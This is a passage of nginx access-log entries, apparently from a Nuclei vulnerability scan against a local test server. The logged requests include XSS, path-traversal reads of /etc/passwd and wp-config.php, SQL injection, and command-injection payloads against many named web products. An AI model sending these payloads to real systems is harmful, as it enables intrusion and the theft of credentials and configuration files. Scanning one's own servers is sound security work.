Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /panel HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:http://www.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpmudev-updates/keys/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/UI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modifica_cliente.php?tipo_tabella=%22>&idclienti=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /query/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/all HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"json={\x22url\x22:\x22/general/../../mysql5/my.ini\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ispirit/interface/gateway.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.html?lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/test.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"s=phpinfo()&_method=__construct&filter=assert","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?s=index/index/index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gemfile.lock HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"fullPath=/etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccm-web/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"{\x22username\x22:\x22nuclei_29KAY9RlrOGaM2JJrS0kbfAzKi7\x22,\x22password\x22:\x2229KAY9ZQw40rXk2yDiHP2v9s7FT\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/signup/step2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dati/availability_tpl.php?num_app_tipo_richiesti1=%22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"29KAY6HxUqBMehKYcFQwgDPl1Tf.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web.config.i18n.ashx?l=nuclei&v=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vr2conf/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat+%2Fetc%2Fpasswd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1/login_pic.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/contentfinder/connector/suggestions.json;%0aOJh.css?query_term=path%3a/&pre=29KAXyhpqYQjXOINwQOObkPIWr4 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/test.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"fullPath=/Windows/win.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"{\x0D\x0A \x22user_login\x22:\x2229KAY1TeEm7MMcn0xBCwyC2REB7\x22,\x0D\x0A \x22password\x22:\x2229KAY1TeEm7MMcn0xBCwyC2REB7\x22,\x0D\x0A \x22user_name\x22:\x2229KAY1TeEm7MMcn0xBCwyC2REB7\x22,\x0D\x0A \x22user_email\x22:\x2229KAY1TeEm7MMcn0xBCwyC2REB7@example.com\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-json/buddypress/v1/signup HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=rsvp-admin-export HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yarn.lock HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensso/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"wlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php?wlcms-action=preview HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0atype+C%3A%5CWindows%5Cwin.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/login_pic.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/go/km/navigation/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wt2parser.cgi?home_en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/tests.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:22 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /systemstatus.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 